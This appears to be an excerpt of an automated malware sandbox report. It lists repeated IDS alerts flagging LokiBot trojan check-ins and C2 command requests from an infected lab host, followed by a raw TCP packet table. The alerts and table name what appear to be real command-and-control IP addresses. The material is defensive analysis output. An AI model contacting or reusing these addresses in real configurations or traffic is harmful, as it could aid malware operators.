                                11/22/21-15:35:21.572750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023680192.168.11.20192.185.217.246
                                11/22/21-15:35:21.572750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023680192.168.11.20192.185.217.246
                                11/22/21-15:35:21.572750TCP2025381ET TROJAN LokiBot Checkin5023680192.168.11.20192.185.217.246
                                11/22/21-15:35:21.572750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023680192.168.11.20192.185.217.246
                                11/22/21-15:35:22.311274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023780192.168.11.20192.185.217.246
                                11/22/21-15:35:22.311274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023780192.168.11.20192.185.217.246
                                11/22/21-15:35:22.311274TCP2025381ET TROJAN LokiBot Checkin5023780192.168.11.20192.185.217.246
                                11/22/21-15:35:22.311274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023780192.168.11.20192.185.217.246
                                11/22/21-15:35:23.160500TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023880192.168.11.20192.185.217.246
                                11/22/21-15:35:23.160500TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023880192.168.11.20192.185.217.246
                                11/22/21-15:35:23.160500TCP2025381ET TROJAN LokiBot Checkin5023880192.168.11.20192.185.217.246
                                11/22/21-15:35:23.160500TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023880192.168.11.20192.185.217.246
                                11/22/21-15:35:23.983829TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023980192.168.11.20192.185.217.246
                                11/22/21-15:35:23.983829TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023980192.168.11.20192.185.217.246
                                11/22/21-15:35:23.983829TCP2025381ET TROJAN LokiBot Checkin5023980192.168.11.20192.185.217.246
                                11/22/21-15:35:23.983829TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023980192.168.11.20192.185.217.246
                                11/22/21-15:35:24.772645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024080192.168.11.20192.185.217.246
                                11/22/21-15:35:24.772645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024080192.168.11.20192.185.217.246
                                11/22/21-15:35:24.772645TCP2025381ET TROJAN LokiBot Checkin5024080192.168.11.20192.185.217.246
                                11/22/21-15:35:24.772645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024080192.168.11.20192.185.217.246
                                11/22/21-15:35:25.618438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024180192.168.11.20192.185.217.246
                                11/22/21-15:35:25.618438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024180192.168.11.20192.185.217.246
                                11/22/21-15:35:25.618438TCP2025381ET TROJAN LokiBot Checkin5024180192.168.11.20192.185.217.246
                                11/22/21-15:35:25.618438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024180192.168.11.20192.185.217.246
                                11/22/21-15:35:26.515056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024280192.168.11.20192.185.217.246
                                11/22/21-15:35:26.515056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024280192.168.11.20192.185.217.246
                                11/22/21-15:35:26.515056TCP2025381ET TROJAN LokiBot Checkin5024280192.168.11.20192.185.217.246
                                11/22/21-15:35:26.515056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024280192.168.11.20192.185.217.246
                                11/22/21-15:35:27.319575TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024380192.168.11.20192.185.217.246
                                11/22/21-15:35:27.319575TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024380192.168.11.20192.185.217.246
                                11/22/21-15:35:27.319575TCP2025381ET TROJAN LokiBot Checkin5024380192.168.11.20192.185.217.246
                                11/22/21-15:35:27.319575TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024380192.168.11.20192.185.217.246
                                11/22/21-15:35:28.157022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024480192.168.11.20192.185.217.246
                                11/22/21-15:35:28.157022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024480192.168.11.20192.185.217.246
                                11/22/21-15:35:28.157022TCP2025381ET TROJAN LokiBot Checkin5024480192.168.11.20192.185.217.246
                                11/22/21-15:35:28.157022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024480192.168.11.20192.185.217.246
                                11/22/21-15:35:28.946258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024580192.168.11.20192.185.217.246
                                11/22/21-15:35:28.946258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024580192.168.11.20192.185.217.246
                                11/22/21-15:35:28.946258TCP2025381ET TROJAN LokiBot Checkin5024580192.168.11.20192.185.217.246
                                11/22/21-15:35:28.946258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024580192.168.11.20192.185.217.246
                                11/22/21-15:35:29.845433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024680192.168.11.20192.185.217.246
                                11/22/21-15:35:29.845433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024680192.168.11.20192.185.217.246
                                11/22/21-15:35:29.845433TCP2025381ET TROJAN LokiBot Checkin5024680192.168.11.20192.185.217.246
                                11/22/21-15:35:29.845433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024680192.168.11.20192.185.217.246
                                11/22/21-15:35:30.601769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024780192.168.11.20192.185.217.246
                                11/22/21-15:35:30.601769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024780192.168.11.20192.185.217.246
                                11/22/21-15:35:30.601769TCP2025381ET TROJAN LokiBot Checkin5024780192.168.11.20192.185.217.246
                                11/22/21-15:35:30.601769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024780192.168.11.20192.185.217.246
                                11/22/21-15:35:31.401409TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024880192.168.11.20192.185.217.246
                                11/22/21-15:35:31.401409TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024880192.168.11.20192.185.217.246
                                11/22/21-15:35:31.401409TCP2025381ET TROJAN LokiBot Checkin5024880192.168.11.20192.185.217.246
                                11/22/21-15:35:31.401409TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024880192.168.11.20192.185.217.246
                                11/22/21-15:35:32.222297TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024980192.168.11.20192.185.217.246
                                11/22/21-15:35:32.222297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024980192.168.11.20192.185.217.246
                                11/22/21-15:35:32.222297TCP2025381ET TROJAN LokiBot Checkin5024980192.168.11.20192.185.217.246
                                11/22/21-15:35:32.222297TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024980192.168.11.20192.185.217.246
                                11/22/21-15:35:33.027293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025080192.168.11.20192.185.217.246
                                11/22/21-15:35:33.027293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025080192.168.11.20192.185.217.246
                                11/22/21-15:35:33.027293TCP2025381ET TROJAN LokiBot Checkin5025080192.168.11.20192.185.217.246
                                11/22/21-15:35:33.027293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025080192.168.11.20192.185.217.246
                                11/22/21-15:35:33.875221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025180192.168.11.20192.185.217.246
                                11/22/21-15:35:33.875221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025180192.168.11.20192.185.217.246
                                11/22/21-15:35:33.875221TCP2025381ET TROJAN LokiBot Checkin5025180192.168.11.20192.185.217.246
                                11/22/21-15:35:33.875221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025180192.168.11.20192.185.217.246
                                11/22/21-15:35:34.680892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025280192.168.11.20192.185.217.246
                                11/22/21-15:35:34.680892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025280192.168.11.20192.185.217.246
                                11/22/21-15:35:34.680892TCP2025381ET TROJAN LokiBot Checkin5025280192.168.11.20192.185.217.246
                                11/22/21-15:35:34.680892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025280192.168.11.20192.185.217.246
                                11/22/21-15:35:35.511952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025380192.168.11.20192.185.217.246
                                11/22/21-15:35:35.511952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025380192.168.11.20192.185.217.246
                                11/22/21-15:35:35.511952TCP2025381ET TROJAN LokiBot Checkin5025380192.168.11.20192.185.217.246
                                11/22/21-15:35:35.511952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025380192.168.11.20192.185.217.246
                                11/22/21-15:35:36.323395TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025480192.168.11.20192.185.217.246
                                11/22/21-15:35:36.323395TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025480192.168.11.20192.185.217.246
                                11/22/21-15:35:36.323395TCP2025381ET TROJAN LokiBot Checkin5025480192.168.11.20192.185.217.246
                                11/22/21-15:35:36.323395TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025480192.168.11.20192.185.217.246
                                11/22/21-15:35:37.142483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025580192.168.11.20192.185.217.246
                                11/22/21-15:35:37.142483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025580192.168.11.20192.185.217.246
                                11/22/21-15:35:37.142483TCP2025381ET TROJAN LokiBot Checkin5025580192.168.11.20192.185.217.246
                                11/22/21-15:35:37.142483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025580192.168.11.20192.185.217.246
                                11/22/21-15:35:37.994775TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025680192.168.11.20192.185.217.246
                                11/22/21-15:35:37.994775TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025680192.168.11.20192.185.217.246
                                11/22/21-15:35:37.994775TCP2025381ET TROJAN LokiBot Checkin5025680192.168.11.20192.185.217.246
                                11/22/21-15:35:37.994775TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025680192.168.11.20192.185.217.246
                                11/22/21-15:35:38.758701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025780192.168.11.20192.185.217.246
                                11/22/21-15:35:38.758701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025780192.168.11.20192.185.217.246
                                11/22/21-15:35:38.758701TCP2025381ET TROJAN LokiBot Checkin5025780192.168.11.20192.185.217.246
                                11/22/21-15:35:38.758701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025780192.168.11.20192.185.217.246
                                11/22/21-15:35:39.603242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025880192.168.11.20192.185.217.246
                                11/22/21-15:35:39.603242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025880192.168.11.20192.185.217.246
                                11/22/21-15:35:39.603242TCP2025381ET TROJAN LokiBot Checkin5025880192.168.11.20192.185.217.246
                                11/22/21-15:35:39.603242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025880192.168.11.20192.185.217.246
                                11/22/21-15:35:40.475305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025980192.168.11.20192.185.217.246
                                11/22/21-15:35:40.475305TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025980192.168.11.20192.185.217.246
                                11/22/21-15:35:40.475305TCP2025381ET TROJAN LokiBot Checkin5025980192.168.11.20192.185.217.246
                                11/22/21-15:35:40.475305TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025980192.168.11.20192.185.217.246
                                11/22/21-15:35:41.323997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026080192.168.11.20192.185.217.246
                                11/22/21-15:35:41.323997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026080192.168.11.20192.185.217.246
                                11/22/21-15:35:41.323997TCP2025381ET TROJAN LokiBot Checkin5026080192.168.11.20192.185.217.246
                                11/22/21-15:35:41.323997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026080192.168.11.20192.185.217.246
                                11/22/21-15:35:42.232831TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026180192.168.11.20192.185.217.246
                                11/22/21-15:35:42.232831TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026180192.168.11.20192.185.217.246
                                11/22/21-15:35:42.232831TCP2025381ET TROJAN LokiBot Checkin5026180192.168.11.20192.185.217.246
                                11/22/21-15:35:42.232831TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026180192.168.11.20192.185.217.246
                                11/22/21-15:35:43.108358TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026280192.168.11.20192.185.217.246
                                11/22/21-15:35:43.108358TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026280192.168.11.20192.185.217.246
                                11/22/21-15:35:43.108358TCP2025381ET TROJAN LokiBot Checkin5026280192.168.11.20192.185.217.246
                                11/22/21-15:35:43.108358TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026280192.168.11.20192.185.217.246
                                11/22/21-15:35:44.005205TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026380192.168.11.20192.185.217.246
                                11/22/21-15:35:44.005205TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026380192.168.11.20192.185.217.246
                                11/22/21-15:35:44.005205TCP2025381ET TROJAN LokiBot Checkin5026380192.168.11.20192.185.217.246
                                11/22/21-15:35:44.005205TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026380192.168.11.20192.185.217.246
                                11/22/21-15:35:44.855863TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026480192.168.11.20192.185.217.246
                                11/22/21-15:35:44.855863TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026480192.168.11.20192.185.217.246
                                11/22/21-15:35:44.855863TCP2025381ET TROJAN LokiBot Checkin5026480192.168.11.20192.185.217.246
                                11/22/21-15:35:44.855863TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026480192.168.11.20192.185.217.246
                                11/22/21-15:35:45.811045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026580192.168.11.20192.185.217.246
                                11/22/21-15:35:45.811045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026580192.168.11.20192.185.217.246
                                11/22/21-15:35:45.811045TCP2025381ET TROJAN LokiBot Checkin5026580192.168.11.20192.185.217.246
                                11/22/21-15:35:45.811045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026580192.168.11.20192.185.217.246
                                11/22/21-15:35:46.687900TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026680192.168.11.20192.185.217.246
                                11/22/21-15:35:46.687900TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026680192.168.11.20192.185.217.246
                                11/22/21-15:35:46.687900TCP2025381ET TROJAN LokiBot Checkin5026680192.168.11.20192.185.217.246
                                11/22/21-15:35:46.687900TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026680192.168.11.20192.185.217.246
                                11/22/21-15:35:47.509720TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026780192.168.11.20192.185.217.246
                                11/22/21-15:35:47.509720TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026780192.168.11.20192.185.217.246
                                11/22/21-15:35:47.509720TCP2025381ET TROJAN LokiBot Checkin5026780192.168.11.20192.185.217.246
                                11/22/21-15:35:47.509720TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026780192.168.11.20192.185.217.246
                                11/22/21-15:35:48.432772TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026880192.168.11.20192.185.217.246
                                11/22/21-15:35:48.432772TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026880192.168.11.20192.185.217.246
                                11/22/21-15:35:48.432772TCP2025381ET TROJAN LokiBot Checkin5026880192.168.11.20192.185.217.246
                                11/22/21-15:35:48.432772TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026880192.168.11.20192.185.217.246
                                11/22/21-15:35:49.407022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026980192.168.11.20192.185.217.246
                                11/22/21-15:35:49.407022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026980192.168.11.20192.185.217.246
                                11/22/21-15:35:49.407022TCP2025381ET TROJAN LokiBot Checkin5026980192.168.11.20192.185.217.246
                                11/22/21-15:35:49.407022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026980192.168.11.20192.185.217.246
                                11/22/21-15:35:50.293852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027080192.168.11.20192.185.217.246
                                11/22/21-15:35:50.293852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027080192.168.11.20192.185.217.246
                                11/22/21-15:35:50.293852TCP2025381ET TROJAN LokiBot Checkin5027080192.168.11.20192.185.217.246
                                11/22/21-15:35:50.293852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027080192.168.11.20192.185.217.246
                                11/22/21-15:35:51.211801TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027180192.168.11.20192.185.217.246
                                11/22/21-15:35:51.211801TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027180192.168.11.20192.185.217.246
                                11/22/21-15:35:51.211801TCP2025381ET TROJAN LokiBot Checkin5027180192.168.11.20192.185.217.246
                                11/22/21-15:35:51.211801TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027180192.168.11.20192.185.217.246
                                11/22/21-15:35:52.096000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027280192.168.11.20192.185.217.246
                                11/22/21-15:35:52.096000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027280192.168.11.20192.185.217.246
                                11/22/21-15:35:52.096000TCP2025381ET TROJAN LokiBot Checkin5027280192.168.11.20192.185.217.246
                                11/22/21-15:35:52.096000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027280192.168.11.20192.185.217.246
                                11/22/21-15:35:52.968297TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027380192.168.11.20192.185.217.246
                                11/22/21-15:35:52.968297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027380192.168.11.20192.185.217.246
                                11/22/21-15:35:52.968297TCP2025381ET TROJAN LokiBot Checkin5027380192.168.11.20192.185.217.246
                                11/22/21-15:35:52.968297TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027380192.168.11.20192.185.217.246
                                11/22/21-15:35:53.975660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027480192.168.11.20192.185.217.246
                                11/22/21-15:35:53.975660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027480192.168.11.20192.185.217.246
                                11/22/21-15:35:53.975660TCP2025381ET TROJAN LokiBot Checkin5027480192.168.11.20192.185.217.246
                                11/22/21-15:35:53.975660TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027480192.168.11.20192.185.217.246
                                11/22/21-15:35:54.946645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027580192.168.11.20192.185.217.246
                                11/22/21-15:35:54.946645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027580192.168.11.20192.185.217.246
                                11/22/21-15:35:54.946645TCP2025381ET TROJAN LokiBot Checkin5027580192.168.11.20192.185.217.246
                                11/22/21-15:35:54.946645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027580192.168.11.20192.185.217.246
                                11/22/21-15:35:55.790438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027680192.168.11.20192.185.217.246
                                11/22/21-15:35:55.790438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027680192.168.11.20192.185.217.246
                                11/22/21-15:35:55.790438TCP2025381ET TROJAN LokiBot Checkin5027680192.168.11.20192.185.217.246
                                11/22/21-15:35:55.790438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027680192.168.11.20192.185.217.246
                                11/22/21-15:35:56.724169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027780192.168.11.20192.185.217.246
                                11/22/21-15:35:56.724169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027780192.168.11.20192.185.217.246
                                11/22/21-15:35:56.724169TCP2025381ET TROJAN LokiBot Checkin5027780192.168.11.20192.185.217.246
                                11/22/21-15:35:56.724169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027780192.168.11.20192.185.217.246
                                11/22/21-15:35:57.506941TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027880192.168.11.20192.185.217.246
                                11/22/21-15:35:57.506941TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027880192.168.11.20192.185.217.246
                                11/22/21-15:35:57.506941TCP2025381ET TROJAN LokiBot Checkin5027880192.168.11.20192.185.217.246
                                11/22/21-15:35:57.506941TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027880192.168.11.20192.185.217.246

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 22, 2021 15:28:58.190808058 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.190881968 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:58.191083908 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.206231117 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.206254959 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:58.562736034 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:58.562982082 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.686371088 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.686460018 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:58.687349081 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:58.687514067 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.690674067 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.731993914 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:58.900618076 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:58.900691032 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:58.900970936 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.901021957 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:58.901036024 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.901046038 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:58.901328087 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.071026087 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.071219921 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.071252108 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.071263075 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.071312904 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.071494102 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.071521044 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.071651936 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.071887970 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.071929932 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.071940899 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.104311943 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.104621887 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.242135048 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.242328882 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.242362976 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.242372990 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.242382050 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.242443085 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.242609978 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.242647886 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.242716074 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.242985964 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.243153095 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.243170977 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.243195057 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.243206978 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.243233919 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.243453979 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.243741035 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.243971109 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.244013071 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.244024992 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.274280071 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.274463892 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.274497986 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.274557114 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.274801016 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.274837971 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.274940968 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.275072098 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.413467884 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.413609028 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.413656950 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.413681030 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.413697004 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.413714886 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.413753986 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.413821936 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.413855076 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.413928032 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.413960934 CET4434978768.66.226.70192.168.11.20
                                Nov 22, 2021 15:28:59.413966894 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.413988113 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:28:59.414143085 CET49787443192.168.11.2068.66.226.70
                                Nov 22, 2021 15:29:00.799598932 CET4978880192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:00.948153973 CET8049788192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:00.948470116 CET4978880192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:00.949976921 CET4978880192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:01.078861952 CET8049788192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:01.079087019 CET4978880192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:01.207973003 CET8049788192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:01.265006065 CET8049788192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:01.265244007 CET4978880192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:01.265302896 CET8049788192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:01.265475988 CET4978880192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:01.393934965 CET8049788192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:07.653945923 CET4978980192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:07.795263052 CET8049789192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:07.795464039 CET4978980192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:07.797027111 CET4978980192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:07.797081947 CET4978980192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:07.938302040 CET8049789192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:07.938390970 CET8049789192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:07.938441038 CET8049789192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:07.938488007 CET8049789192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:08.094770908 CET8049789192.185.217.246192.168.11.20
